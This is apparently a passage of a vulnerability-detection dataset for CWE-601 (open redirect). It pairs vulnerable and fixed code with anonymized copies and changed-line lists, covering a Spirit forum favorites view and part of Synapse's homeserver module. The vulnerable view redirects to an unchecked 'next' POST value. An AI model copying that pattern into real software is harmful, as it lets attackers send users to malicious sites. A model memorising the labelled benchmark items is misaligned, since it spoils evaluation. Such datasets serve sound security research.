class CLASS_1(UnicornView):
VAR_1 = "World"
class CLASS_2:
VAR_10 = ("name",)
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
assert "name" not in VAR_0.get_frontend_context_variables()
assert "name" in VAR_0.get_context_data()
def FUNC_15():
class CLASS_1(UnicornView):
VAR_1 = "World"
class CLASS_2:
VAR_11 = ("name",)
VAR_0 = CLASS_1(component_id="asdf1234", component_name="hello-world")
assert "name" not in VAR_0.get_frontend_context_variables()
assert "name" not in VAR_0.get_context_data()
| [
2,
5,
7,
8,
11,
14,
15,
19,
20,
24,
27,
28,
33,
36,
37,
42,
43,
48,
49,
54,
55,
61,
66,
67,
70,
71,
76,
77,
83,
84,
86,
88,
96,
97,
99,
101,
106,
108,
116,
117,
125,
126,
129,
130,
133,
134,
137,
138,
142,
145,
149,
150,
154,
157,
161
] | [
2,
5,
7,
8,
11,
14,
15,
19,
20,
24,
27,
28,
33,
36,
37,
42,
43,
48,
49,
54,
55,
61,
66,
67,
70,
71,
76,
77,
83,
84,
92,
93,
96,
97,
100,
101,
104,
105,
109,
112,
116,
117,
121,
124,
128
] |
4CWE-601
| # -*- coding: utf-8 -*-
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404
from django.shortcuts import redirect
from django.views.decorators.http import require_POST
from django.contrib import messages
from .models import TopicFavorite
from .forms import FavoriteForm
from ..models import Topic
from ...core import utils
@require_POST
@login_required
def create(request, topic_id):
topic = get_object_or_404(Topic, pk=topic_id)
form = FavoriteForm(user=request.user, topic=topic, data=request.POST)
if form.is_valid():
form.save()
else:
messages.error(request, utils.render_form_errors(form))
return redirect(request.POST.get('next', topic.get_absolute_url()))
@require_POST
@login_required
def delete(request, pk):
favorite = get_object_or_404(TopicFavorite, pk=pk, user=request.user)
favorite.delete()
return redirect(request.POST.get('next', favorite.topic.get_absolute_url()))
| # -*- coding: utf-8 -*-
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404
from django.views.decorators.http import require_POST
from django.contrib import messages
from .models import TopicFavorite
from .forms import FavoriteForm
from ..models import Topic
from spirit.core import utils
from spirit.core.utils.http import safe_redirect
@require_POST
@login_required
def create(request, topic_id):
topic = get_object_or_404(Topic, pk=topic_id)
form = FavoriteForm(user=request.user, topic=topic, data=request.POST)
if form.is_valid():
form.save()
else:
messages.error(request, utils.render_form_errors(form))
return safe_redirect(request, 'next', topic.get_absolute_url(), method='POST')
@require_POST
@login_required
def delete(request, pk):
favorite = get_object_or_404(TopicFavorite, pk=pk, user=request.user)
favorite.delete()
return safe_redirect(request, 'next', favorite.topic.get_absolute_url(), method='POST')
| open_redirect | {
"code": [
"from django.shortcuts import redirect",
"from ...core import utils",
" return redirect(request.POST.get('next', topic.get_absolute_url()))",
" return redirect(request.POST.get('next', favorite.topic.get_absolute_url()))"
],
"line_no": [
5,
12,
26,
34
]
} | {
"code": [
"from spirit.core import utils",
"from spirit.core.utils.http import safe_redirect",
" return safe_redirect(request, 'next', topic.get_absolute_url(), method='POST')",
" return safe_redirect(request, 'next', favorite.topic.get_absolute_url(), method='POST')"
],
"line_no": [
11,
12,
26,
34
]
} |
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404
from django.shortcuts import redirect
from django.views.decorators.http import require_POST
from django.contrib import messages
from .models import TopicFavorite
from .forms import FavoriteForm
from ..models import Topic
from ...core import utils
@require_POST
@login_required
def FUNC_0(VAR_0, VAR_1):
VAR_3 = get_object_or_404(Topic, VAR_2=VAR_1)
VAR_4 = FavoriteForm(user=VAR_0.user, VAR_3=topic, data=VAR_0.POST)
if VAR_4.is_valid():
VAR_4.save()
else:
messages.error(VAR_0, utils.render_form_errors(VAR_4))
return redirect(VAR_0.POST.get('next', VAR_3.get_absolute_url()))
@require_POST
@login_required
def FUNC_1(VAR_0, VAR_2):
VAR_5 = get_object_or_404(TopicFavorite, VAR_2=pk, user=VAR_0.user)
VAR_5.delete()
return redirect(VAR_0.POST.get('next', VAR_5.topic.get_absolute_url()))
|
from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404
from django.views.decorators.http import require_POST
from django.contrib import messages
from .models import TopicFavorite
from .forms import FavoriteForm
from ..models import Topic
from spirit.core import utils
from spirit.core.utils.http import safe_redirect
@require_POST
@login_required
def FUNC_0(VAR_0, VAR_1):
VAR_3 = get_object_or_404(Topic, VAR_2=VAR_1)
VAR_4 = FavoriteForm(user=VAR_0.user, VAR_3=topic, data=VAR_0.POST)
if VAR_4.is_valid():
VAR_4.save()
else:
messages.error(VAR_0, utils.render_form_errors(VAR_4))
return safe_redirect(VAR_0, 'next', VAR_3.get_absolute_url(), method='POST')
@require_POST
@login_required
def FUNC_1(VAR_0, VAR_2):
VAR_5 = get_object_or_404(TopicFavorite, VAR_2=pk, user=VAR_0.user)
VAR_5.delete()
return safe_redirect(VAR_0, 'next', VAR_5.topic.get_absolute_url(), method='POST')
| [
1,
2,
8,
13,
14,
20,
25,
27,
28,
35
] | [
1,
2,
7,
13,
14,
20,
25,
27,
28,
35
] |
4CWE-601
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2017-2018 New Vector Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file provides some classes for setting up (partially-populated)
# homeservers; either as a full homeserver as a real application, or a small
# partial one for unit test mocking.
# Imports required for the default HomeServer() implementation
import abc
import functools
import logging
import os
from typing import TYPE_CHECKING, Any, Callable, Dict, List, Optional, TypeVar, cast
import twisted.internet.base
import twisted.internet.tcp
from twisted.mail.smtp import sendmail
from twisted.web.iweb import IPolicyForHTTPS
from synapse.api.auth import Auth
from synapse.api.filtering import Filtering
from synapse.api.ratelimiting import Ratelimiter
from synapse.appservice.api import ApplicationServiceApi
from synapse.appservice.scheduler import ApplicationServiceScheduler
from synapse.config.homeserver import HomeServerConfig
from synapse.crypto import context_factory
from synapse.crypto.context_factory import RegularPolicyForHTTPS
from synapse.crypto.keyring import Keyring
from synapse.events.builder import EventBuilderFactory
from synapse.events.spamcheck import SpamChecker
from synapse.events.third_party_rules import ThirdPartyEventRules
from synapse.events.utils import EventClientSerializer
from synapse.federation.federation_client import FederationClient
from synapse.federation.federation_server import (
FederationHandlerRegistry,
FederationServer,
)
from synapse.federation.send_queue import FederationRemoteSendQueue
from synapse.federation.sender import FederationSender
from synapse.federation.transport.client import TransportLayerClient
from synapse.groups.attestations import GroupAttestationSigning, GroupAttestionRenewer
from synapse.groups.groups_server import GroupsServerHandler, GroupsServerWorkerHandler
from synapse.handlers.account_validity import AccountValidityHandler
from synapse.handlers.acme import AcmeHandler
from synapse.handlers.admin import AdminHandler
from synapse.handlers.appservice import ApplicationServicesHandler
from synapse.handlers.auth import AuthHandler, MacaroonGenerator
from synapse.handlers.cas_handler import CasHandler
from synapse.handlers.deactivate_account import DeactivateAccountHandler
from synapse.handlers.device import DeviceHandler, DeviceWorkerHandler
from synapse.handlers.devicemessage import DeviceMessageHandler
from synapse.handlers.directory import DirectoryHandler
from synapse.handlers.e2e_keys import E2eKeysHandler
from synapse.handlers.e2e_room_keys import E2eRoomKeysHandler
from synapse.handlers.events import EventHandler, EventStreamHandler
from synapse.handlers.federation import FederationHandler
from synapse.handlers.groups_local import GroupsLocalHandler, GroupsLocalWorkerHandler
from synapse.handlers.identity import IdentityHandler
from synapse.handlers.initial_sync import InitialSyncHandler
from synapse.handlers.message import EventCreationHandler, MessageHandler
from synapse.handlers.pagination import PaginationHandler
from synapse.handlers.password_policy import PasswordPolicyHandler
from synapse.handlers.presence import PresenceHandler
from synapse.handlers.profile import ProfileHandler
from synapse.handlers.read_marker import ReadMarkerHandler
from synapse.handlers.receipts import ReceiptsHandler
from synapse.handlers.register import RegistrationHandler
from synapse.handlers.room import (
RoomContextHandler,
RoomCreationHandler,
RoomShutdownHandler,
)
from synapse.handlers.room_list import RoomListHandler
from synapse.handlers.room_member import RoomMemberMasterHandler
from synapse.handlers.room_member_worker import RoomMemberWorkerHandler
from synapse.handlers.search import SearchHandler
from synapse.handlers.set_password import SetPasswordHandler
from synapse.handlers.sso import SsoHandler
from synapse.handlers.stats import StatsHandler
from synapse.handlers.sync import SyncHandler
from synapse.handlers.typing import FollowerTypingHandler, TypingWriterHandler
from synapse.handlers.user_directory import UserDirectoryHandler
from synapse.http.client import InsecureInterceptableContextFactory, SimpleHttpClient
from synapse.http.matrixfederationclient import MatrixFederationHttpClient
from synapse.module_api import ModuleApi
from synapse.notifier import Notifier
from synapse.push.action_generator import ActionGenerator
from synapse.push.pusherpool import PusherPool
from synapse.replication.tcp.client import ReplicationDataHandler
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.resource import ReplicationStreamer
from synapse.replication.tcp.streams import STREAMS_MAP, Stream
from synapse.rest.media.v1.media_repository import (
MediaRepository,
MediaRepositoryResource,
)
from synapse.secrets import Secrets
from synapse.server_notices.server_notices_manager import ServerNoticesManager
from synapse.server_notices.server_notices_sender import ServerNoticesSender
from synapse.server_notices.worker_server_notices_sender import (
WorkerServerNoticesSender,
)
from synapse.state import StateHandler, StateResolutionHandler
from synapse.storage import Databases, DataStore, Storage
from synapse.streams.events import EventSources
from synapse.types import DomainSpecificString
from synapse.util import Clock
from synapse.util.distributor import Distributor
from synapse.util.ratelimitutils import FederationRateLimiter
from synapse.util.stringutils import random_string
logger = logging.getLogger(__name__)
if TYPE_CHECKING:
from synapse.handlers.oidc_handler import OidcHandler
from synapse.handlers.saml_handler import SamlHandler
T = TypeVar("T", bound=Callable[..., Any])
def cache_in_self(builder: T) -> T:
"""Wraps a function called e.g. `get_foo`, checking if `self.foo` exists and
returning if so. If not, calls the given function and sets `self.foo` to it.
Also ensures that dependency cycles throw an exception correctly, rather
than overflowing the stack.
"""
if not builder.__name__.startswith("get_"):
raise Exception(
"@cache_in_self can only be used on functions starting with `get_`"
)
# get_attr -> _attr
depname = builder.__name__[len("get") :]
building = [False]
@functools.wraps(builder)
def _get(self):
try:
return getattr(self, depname)
except AttributeError:
pass
# Prevent cyclic dependencies from deadlocking
if building[0]:
raise ValueError("Cyclic dependency while building %s" % (depname,))
building[0] = True
try:
dep = builder(self)
setattr(self, depname, dep)
finally:
building[0] = False
return dep
# We cast here as we need to tell mypy that `_get` has the same signature as
# `builder`.
return cast(T, _get)
class HomeServer(metaclass=abc.ABCMeta):
"""A basic homeserver object without lazy component builders.
This will need all of the components it requires to either be passed as
constructor arguments, or the relevant methods overriding to create them.
Typically this would only be used for unit tests.
Dependencies should be added by creating a `def get_<depname>(self)`
function, wrapping it in `@cache_in_self`.
Attributes:
config (synapse.config.homeserver.HomeserverConfig):
_listening_services (list[twisted.internet.tcp.Port]): TCP ports that
we are listening on to provide HTTP services.
"""
REQUIRED_ON_BACKGROUND_TASK_STARTUP = [
"account_validity",
"auth",
"deactivate_account",
"message",
"pagination",
"profile",
"stats",
]
# This is overridden in derived application classes
# (such as synapse.app.homeserver.SynapseHomeServer) and gives the class to be
# instantiated during setup() for future return by get_datastore()
DATASTORE_CLASS = abc.abstractproperty()
def __init__(
self,
hostname: str,
config: HomeServerConfig,
reactor=None,
version_string="Synapse",
):
"""
Args:
hostname : The hostname for the server.
config: The full config for the homeserver.
"""
if not reactor:
from twisted.internet import reactor as _reactor
reactor = _reactor
self._reactor = reactor
self.hostname = hostname
# the key we use to sign events and requests
self.signing_key = config.key.signing_key[0]
self.config = config
self._listening_services = [] # type: List[twisted.internet.tcp.Port]
self.start_time = None # type: Optional[int]
self._instance_id = random_string(5)
self._instance_name = config.worker_name or "master"
self.version_string = version_string
self.datastores = None # type: Optional[Databases]
def get_instance_id(self) -> str:
"""A unique ID for this synapse process instance.
This is used to distinguish running instances in worker-based
deployments.
"""
return self._instance_id
def get_instance_name(self) -> str:
"""A unique name for this synapse process.
Used to identify the process over replication and in config. Does not
change over restarts.
"""
return self._instance_name
def setup(self) -> None:
logger.info("Setting up.")
self.start_time = int(self.get_clock().time())
self.datastores = Databases(self.DATASTORE_CLASS, self)
logger.info("Finished setting up.")
# Register background tasks required by this server. This must be done
# somewhat manually due to the background tasks not being registered
# unless handlers are instantiated.
if self.config.run_background_tasks:
self.setup_background_tasks()
def setup_background_tasks(self) -> None:
"""
Some handlers have side effects on instantiation (like registering
background updates). This function causes them to be fetched, and
therefore instantiated, to run those side effects.
"""
for i in self.REQUIRED_ON_BACKGROUND_TASK_STARTUP:
getattr(self, "get_" + i + "_handler")()
def get_reactor(self) -> twisted.internet.base.ReactorBase:
"""
Fetch the Twisted reactor in use by this HomeServer.
"""
return self._reactor
def get_ip_from_request(self, request) -> str:
# X-Forwarded-For is handled by our custom request type.
return request.getClientIP()
def is_mine(self, domain_specific_string: DomainSpecificString) -> bool:
return domain_specific_string.domain == self.hostname
def is_mine_id(self, string: str) -> bool:
return string.split(":", 1)[1] == self.hostname
@cache_in_self
def get_clock(self) -> Clock:
return Clock(self._reactor)
def get_datastore(self) -> DataStore:
if not self.datastores:
raise Exception("HomeServer.setup must be called before getting datastores")
return self.datastores.main
def get_datastores(self) -> Databases:
if not self.datastores:
raise Exception("HomeServer.setup must be called before getting datastores")
return self.datastores
def get_config(self) -> HomeServerConfig:
return self.config
@cache_in_self
def get_distributor(self) -> Distributor:
return Distributor()
@cache_in_self
def get_registration_ratelimiter(self) -> Ratelimiter:
return Ratelimiter(
clock=self.get_clock(),
rate_hz=self.config.rc_registration.per_second,
burst_count=self.config.rc_registration.burst_count,
)
@cache_in_self
def get_federation_client(self) -> FederationClient:
return FederationClient(self)
@cache_in_self
def get_federation_server(self) -> FederationServer:
return FederationServer(self)
@cache_in_self
def get_notifier(self) -> Notifier:
return Notifier(self)
@cache_in_self
def get_auth(self) -> Auth:
return Auth(self)
@cache_in_self
def get_http_client_context_factory(self) -> IPolicyForHTTPS:
return (
InsecureInterceptableContextFactory()
if self.config.use_insecure_ssl_client_just_for_testing_do_not_use
else RegularPolicyForHTTPS()
)
@cache_in_self
def get_simple_http_client(self) -> SimpleHttpClient:
return SimpleHttpClient(self)
@cache_in_self
def get_proxied_http_client(self) -> SimpleHttpClient:
return SimpleHttpClient(
self,
http_proxy=os.getenvb(b"http_proxy"),
https_proxy=os.getenvb(b"HTTPS_PROXY"),
)
@cache_in_self
def get_room_creation_handler(self) -> RoomCreationHandler:
return RoomCreationHandler(self)
@cache_in_self
def get_room_shutdown_handler(self) -> RoomShutdownHandler:
return RoomShutdownHandler(self)
@cache_in_self
def get_sendmail(self) -> sendmail:
return sendmail
@cache_in_self
def get_state_handler(self) -> StateHandler:
return StateHandler(self)
@cache_in_self
def get_state_resolution_handler(self) -> StateResolutionHandler:
return StateResolutionHandler(self)
@cache_in_self
def get_presence_handler(self) -> PresenceHandler:
return PresenceHandler(self)
@cache_in_self
def get_typing_handler(self):
if self.config.worker.writers.typing == self.get_instance_name():
return TypingWriterHandler(self)
else:
return FollowerTypingHandler(self)
@cache_in_self
def get_sso_handler(self) -> SsoHandler:
return SsoHandler(self)
@cache_in_self
def get_sync_handler(self) -> SyncHandler:
return SyncHandler(self)
@cache_in_self
def get_room_list_handler(self) -> RoomListHandler:
return RoomListHandler(self)
@cache_in_self
def get_auth_handler(self) -> AuthHandler:
return AuthHandler(self)
@cache_in_self
def get_macaroon_generator(self) -> MacaroonGenerator:
return MacaroonGenerator(self)
@cache_in_self
def get_device_handler(self):
if self.config.worker_app:
return DeviceWorkerHandler(self)
else:
return DeviceHandler(self)
@cache_in_self
def get_device_message_handler(self) -> DeviceMessageHandler:
return DeviceMessageHandler(self)
@cache_in_self
def get_directory_handler(self) -> DirectoryHandler:
return DirectoryHandler(self)
@cache_in_self
def get_e2e_keys_handler(self) -> E2eKeysHandler:
return E2eKeysHandler(self)
@cache_in_self
def get_e2e_room_keys_handler(self) -> E2eRoomKeysHandler:
return E2eRoomKeysHandler(self)
@cache_in_self
def get_acme_handler(self) -> AcmeHandler:
return AcmeHandler(self)
@cache_in_self
def get_admin_handler(self) -> AdminHandler:
return AdminHandler(self)
@cache_in_self
def get_application_service_api(self) -> ApplicationServiceApi:
return ApplicationServiceApi(self)
@cache_in_self
def get_application_service_scheduler(self) -> ApplicationServiceScheduler:
return ApplicationServiceScheduler(self)
@cache_in_self
def get_application_service_handler(self) -> ApplicationServicesHandler:
return ApplicationServicesHandler(self)
@cache_in_self
def get_event_handler(self) -> EventHandler:
return EventHandler(self)
@cache_in_self
def get_event_stream_handler(self) -> EventStreamHandler:
return EventStreamHandler(self)
@cache_in_self
def get_federation_handler(self) -> FederationHandler:
return FederationHandler(self)
@cache_in_self
def get_identity_handler(self) -> IdentityHandler:
return IdentityHandler(self)
@cache_in_self
def get_initial_sync_handler(self) -> InitialSyncHandler:
return InitialSyncHandler(self)
@cache_in_self
def get_profile_handler(self):
return ProfileHandler(self)
@cache_in_self
def get_event_creation_handler(self) -> EventCreationHandler:
return EventCreationHandler(self)
@cache_in_self
def get_deactivate_account_handler(self) -> DeactivateAccountHandler:
return DeactivateAccountHandler(self)
@cache_in_self
def get_search_handler(self) -> SearchHandler:
return SearchHandler(self)
@cache_in_self
def get_set_password_handler(self) -> SetPasswordHandler:
return SetPasswordHandler(self)
@cache_in_self
def get_event_sources(self) -> EventSources:
return EventSources(self)
@cache_in_self
def get_keyring(self) -> Keyring:
return Keyring(self)
@cache_in_self
def get_event_builder_factory(self) -> EventBuilderFactory:
return EventBuilderFactory(self)
@cache_in_self
def get_filtering(self) -> Filtering:
return Filtering(self)
@cache_in_self
def get_pusherpool(self) -> PusherPool:
return PusherPool(self)
@cache_in_self
def get_http_client(self) -> MatrixFederationHttpClient:
tls_client_options_factory = context_factory.FederationPolicyForHTTPS(
self.config
)
return MatrixFederationHttpClient(self, tls_client_options_factory)
@cache_in_self
def get_media_repository_resource(self) -> MediaRepositoryResource:
# build the media repo resource. This indirects through the HomeServer
# to ensure that we only have a single instance of
return MediaRepositoryResource(self)
@cache_in_self
def get_media_repository(self) -> MediaRepository:
return MediaRepository(self)
@cache_in_self
def get_federation_transport_client(self) -> TransportLayerClient:
return TransportLayerClient(self)
@cache_in_self
def get_federation_sender(self):
if self.should_send_federation():
return FederationSender(self)
elif not self.config.worker_app:
return FederationRemoteSendQueue(self)
else:
raise Exception("Workers cannot send federation traffic")
@cache_in_self
def get_receipts_handler(self) -> ReceiptsHandler:
return ReceiptsHandler(self)
@cache_in_self
def get_read_marker_handler(self) -> ReadMarkerHandler:
return ReadMarkerHandler(self)
@cache_in_self
def get_tcp_replication(self) -> ReplicationCommandHandler:
return ReplicationCommandHandler(self)
@cache_in_self
def get_action_generator(self) -> ActionGenerator:
return ActionGenerator(self)
@cache_in_self
def get_user_directory_handler(self) -> UserDirectoryHandler:
return UserDirectoryHandler(self)
@cache_in_self
def get_groups_local_handler(self):
if self.config.worker_app:
return GroupsLocalWorkerHandler(self)
else:
return GroupsLocalHandler(self)
@cache_in_self
def get_groups_server_handler(self):
if self.config.worker_app:
return GroupsServerWorkerHandler(self)
else:
return GroupsServerHandler(self)
@cache_in_self
def get_groups_attestation_signing(self) -> GroupAttestationSigning:
return GroupAttestationSigning(self)
@cache_in_self
def get_groups_attestation_renewer(self) -> GroupAttestionRenewer:
return GroupAttestionRenewer(self)
@cache_in_self
def get_secrets(self) -> Secrets:
return Secrets()
@cache_in_self
def get_stats_handler(self) -> StatsHandler:
return StatsHandler(self)
@cache_in_self
def get_spam_checker(self):
return SpamChecker(self)
@cache_in_self
def get_third_party_event_rules(self) -> ThirdPartyEventRules:
return ThirdPartyEventRules(self)
@cache_in_self
def get_room_member_handler(self):
if self.config.worker_app:
return RoomMemberWorkerHandler(self)
return RoomMemberMasterHandler(self)
@cache_in_self
def get_federation_registry(self) -> FederationHandlerRegistry:
return FederationHandlerRegistry(self)
@cache_in_self
def get_server_notices_manager(self):
if self.config.worker_app:
raise Exception("Workers cannot send server notices")
return ServerNoticesManager(self)
@cache_in_self
def get_server_notices_sender(self):
if self.config.worker_app:
return WorkerServerNoticesSender(self)
return ServerNoticesSender(self)
@cache_in_self
def get_message_handler(self) -> MessageHandler:
return MessageHandler(self)
@cache_in_self
def get_pagination_handler(self) -> PaginationHandler:
return PaginationHandler(self)
@cache_in_self
def get_room_context_handler(self) -> RoomContextHandler:
return RoomContextHandler(self)
@cache_in_self
def get_registration_handler(self) -> RegistrationHandler:
return RegistrationHandler(self)
@cache_in_self
def get_account_validity_handler(self) -> AccountValidityHandler:
return AccountValidityHandler(self)
@cache_in_self
def get_cas_handler(self) -> CasHandler:
return CasHandler(self)
@cache_in_self
def get_saml_handler(self) -> "SamlHandler":
from synapse.handlers.saml_handler import SamlHandler
return SamlHandler(self)
@cache_in_self
def get_oidc_handler(self) -> "OidcHandler":
from synapse.handlers.oidc_handler import OidcHandler
return OidcHandler(self)
@cache_in_self
def get_event_client_serializer(self) -> EventClientSerializer:
return EventClientSerializer(self)
@cache_in_self
def get_password_policy_handler(self) -> PasswordPolicyHandler:
return PasswordPolicyHandler(self)
@cache_in_self
def get_storage(self) -> Storage:
return Storage(self, self.get_datastores())
@cache_in_self
def get_replication_streamer(self) -> ReplicationStreamer:
return ReplicationStreamer(self)
@cache_in_self
def get_replication_data_handler(self) -> ReplicationDataHandler:
return ReplicationDataHandler(self)
@cache_in_self
def get_replication_streams(self) -> Dict[str, Stream]:
return {stream.NAME: stream(self) for stream in STREAMS_MAP.values()}
@cache_in_self
def get_federation_ratelimiter(self) -> FederationRateLimiter:
return FederationRateLimiter(self.get_clock(), config=self.config.rc_federation)
@cache_in_self
def get_module_api(self) -> ModuleApi:
return ModuleApi(self, self.get_auth_handler())
async def remove_pusher(self, app_id: str, push_key: str, user_id: str):
return await self.get_pusherpool().remove_pusher(app_id, push_key, user_id)
def should_send_federation(self) -> bool:
"Should this server be sending federation traffic directly?"
return self.config.send_federation and (
not self.config.worker_app
or self.config.worker_app == "synapse.app.federation_sender"
)
| # -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
# Copyright 2017-2018 New Vector Ltd
# Copyright 2019 The Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This file provides some classes for setting up (partially-populated)
# homeservers; either as a full homeserver as a real application, or a small
# partial one for unit test mocking.
# Imports required for the default HomeServer() implementation
import abc
import functools
import logging
import os
from typing import TYPE_CHECKING, Any, Callable, Dict, List, Optional, TypeVar, cast
import twisted.internet.base
import twisted.internet.tcp
from twisted.mail.smtp import sendmail
from twisted.web.iweb import IPolicyForHTTPS
from synapse.api.auth import Auth
from synapse.api.filtering import Filtering
from synapse.api.ratelimiting import Ratelimiter
from synapse.appservice.api import ApplicationServiceApi
from synapse.appservice.scheduler import ApplicationServiceScheduler
from synapse.config.homeserver import HomeServerConfig
from synapse.crypto import context_factory
from synapse.crypto.context_factory import RegularPolicyForHTTPS
from synapse.crypto.keyring import Keyring
from synapse.events.builder import EventBuilderFactory
from synapse.events.spamcheck import SpamChecker
from synapse.events.third_party_rules import ThirdPartyEventRules
from synapse.events.utils import EventClientSerializer
from synapse.federation.federation_client import FederationClient
from synapse.federation.federation_server import (
FederationHandlerRegistry,
FederationServer,
)
from synapse.federation.send_queue import FederationRemoteSendQueue
from synapse.federation.sender import FederationSender
from synapse.federation.transport.client import TransportLayerClient
from synapse.groups.attestations import GroupAttestationSigning, GroupAttestionRenewer
from synapse.groups.groups_server import GroupsServerHandler, GroupsServerWorkerHandler
from synapse.handlers.account_validity import AccountValidityHandler
from synapse.handlers.acme import AcmeHandler
from synapse.handlers.admin import AdminHandler
from synapse.handlers.appservice import ApplicationServicesHandler
from synapse.handlers.auth import AuthHandler, MacaroonGenerator
from synapse.handlers.cas_handler import CasHandler
from synapse.handlers.deactivate_account import DeactivateAccountHandler
from synapse.handlers.device import DeviceHandler, DeviceWorkerHandler
from synapse.handlers.devicemessage import DeviceMessageHandler
from synapse.handlers.directory import DirectoryHandler
from synapse.handlers.e2e_keys import E2eKeysHandler
from synapse.handlers.e2e_room_keys import E2eRoomKeysHandler
from synapse.handlers.events import EventHandler, EventStreamHandler
from synapse.handlers.federation import FederationHandler
from synapse.handlers.groups_local import GroupsLocalHandler, GroupsLocalWorkerHandler
from synapse.handlers.identity import IdentityHandler
from synapse.handlers.initial_sync import InitialSyncHandler
from synapse.handlers.message import EventCreationHandler, MessageHandler
from synapse.handlers.pagination import PaginationHandler
from synapse.handlers.password_policy import PasswordPolicyHandler
from synapse.handlers.presence import PresenceHandler
from synapse.handlers.profile import ProfileHandler
from synapse.handlers.read_marker import ReadMarkerHandler
from synapse.handlers.receipts import ReceiptsHandler
from synapse.handlers.register import RegistrationHandler
from synapse.handlers.room import (
RoomContextHandler,
RoomCreationHandler,
RoomShutdownHandler,
)
from synapse.handlers.room_list import RoomListHandler
from synapse.handlers.room_member import RoomMemberMasterHandler
from synapse.handlers.room_member_worker import RoomMemberWorkerHandler
from synapse.handlers.search import SearchHandler
from synapse.handlers.set_password import SetPasswordHandler
from synapse.handlers.sso import SsoHandler
from synapse.handlers.stats import StatsHandler
from synapse.handlers.sync import SyncHandler
from synapse.handlers.typing import FollowerTypingHandler, TypingWriterHandler
from synapse.handlers.user_directory import UserDirectoryHandler
from synapse.http.client import InsecureInterceptableContextFactory, SimpleHttpClient
from synapse.http.matrixfederationclient import MatrixFederationHttpClient
from synapse.module_api import ModuleApi
from synapse.notifier import Notifier
from synapse.push.action_generator import ActionGenerator
from synapse.push.pusherpool import PusherPool
from synapse.replication.tcp.client import ReplicationDataHandler
from synapse.replication.tcp.handler import ReplicationCommandHandler
from synapse.replication.tcp.resource import ReplicationStreamer
from synapse.replication.tcp.streams import STREAMS_MAP, Stream
from synapse.rest.media.v1.media_repository import (
MediaRepository,
MediaRepositoryResource,
)
from synapse.secrets import Secrets
from synapse.server_notices.server_notices_manager import ServerNoticesManager
from synapse.server_notices.server_notices_sender import ServerNoticesSender
from synapse.server_notices.worker_server_notices_sender import (
WorkerServerNoticesSender,
)
from synapse.state import StateHandler, StateResolutionHandler
from synapse.storage import Databases, DataStore, Storage
from synapse.streams.events import EventSources
from synapse.types import DomainSpecificString
from synapse.util import Clock
from synapse.util.distributor import Distributor
from synapse.util.ratelimitutils import FederationRateLimiter
from synapse.util.stringutils import random_string
logger = logging.getLogger(__name__)
if TYPE_CHECKING:
from synapse.handlers.oidc_handler import OidcHandler
from synapse.handlers.saml_handler import SamlHandler
T = TypeVar("T", bound=Callable[..., Any])
def cache_in_self(builder: T) -> T:
"""Wraps a function called e.g. `get_foo`, checking if `self.foo` exists and
returning if so. If not, calls the given function and sets `self.foo` to it.
Also ensures that dependency cycles throw an exception correctly, rather
than overflowing the stack.
"""
if not builder.__name__.startswith("get_"):
raise Exception(
"@cache_in_self can only be used on functions starting with `get_`"
)
# get_attr -> _attr
depname = builder.__name__[len("get") :]
building = [False]
@functools.wraps(builder)
def _get(self):
try:
return getattr(self, depname)
except AttributeError:
pass
# Prevent cyclic dependencies from deadlocking
if building[0]:
raise ValueError("Cyclic dependency while building %s" % (depname,))
building[0] = True
try:
dep = builder(self)
setattr(self, depname, dep)
finally:
building[0] = False
return dep
# We cast here as we need to tell mypy that `_get` has the same signature as
# `builder`.
return cast(T, _get)
class HomeServer(metaclass=abc.ABCMeta):
"""A basic homeserver object without lazy component builders.
This will need all of the components it requires to either be passed as
constructor arguments, or the relevant methods overriding to create them.
Typically this would only be used for unit tests.
Dependencies should be added by creating a `def get_<depname>(self)`
function, wrapping it in `@cache_in_self`.
Attributes:
config (synapse.config.homeserver.HomeserverConfig):
_listening_services (list[twisted.internet.tcp.Port]): TCP ports that
we are listening on to provide HTTP services.
"""
REQUIRED_ON_BACKGROUND_TASK_STARTUP = [
"account_validity",
"auth",
"deactivate_account",
"message",
"pagination",
"profile",
"stats",
]
# This is overridden in derived application classes
# (such as synapse.app.homeserver.SynapseHomeServer) and gives the class to be
# instantiated during setup() for future return by get_datastore()
DATASTORE_CLASS = abc.abstractproperty()
def __init__(
self,
hostname: str,
config: HomeServerConfig,
reactor=None,
version_string="Synapse",
):
"""
Args:
hostname : The hostname for the server.
config: The full config for the homeserver.
"""
if not reactor:
from twisted.internet import reactor as _reactor
reactor = _reactor
self._reactor = reactor
self.hostname = hostname
# the key we use to sign events and requests
self.signing_key = config.key.signing_key[0]
self.config = config
self._listening_services = [] # type: List[twisted.internet.tcp.Port]
self.start_time = None # type: Optional[int]
self._instance_id = random_string(5)
self._instance_name = config.worker_name or "master"
self.version_string = version_string
self.datastores = None # type: Optional[Databases]
def get_instance_id(self) -> str:
"""A unique ID for this synapse process instance.
This is used to distinguish running instances in worker-based
deployments.
"""
return self._instance_id
def get_instance_name(self) -> str:
"""A unique name for this synapse process.
Used to identify the process over replication and in config. Does not
change over restarts.
"""
return self._instance_name
def setup(self) -> None:
logger.info("Setting up.")
self.start_time = int(self.get_clock().time())
self.datastores = Databases(self.DATASTORE_CLASS, self)
logger.info("Finished setting up.")
# Register background tasks required by this server. This must be done
# somewhat manually due to the background tasks not being registered
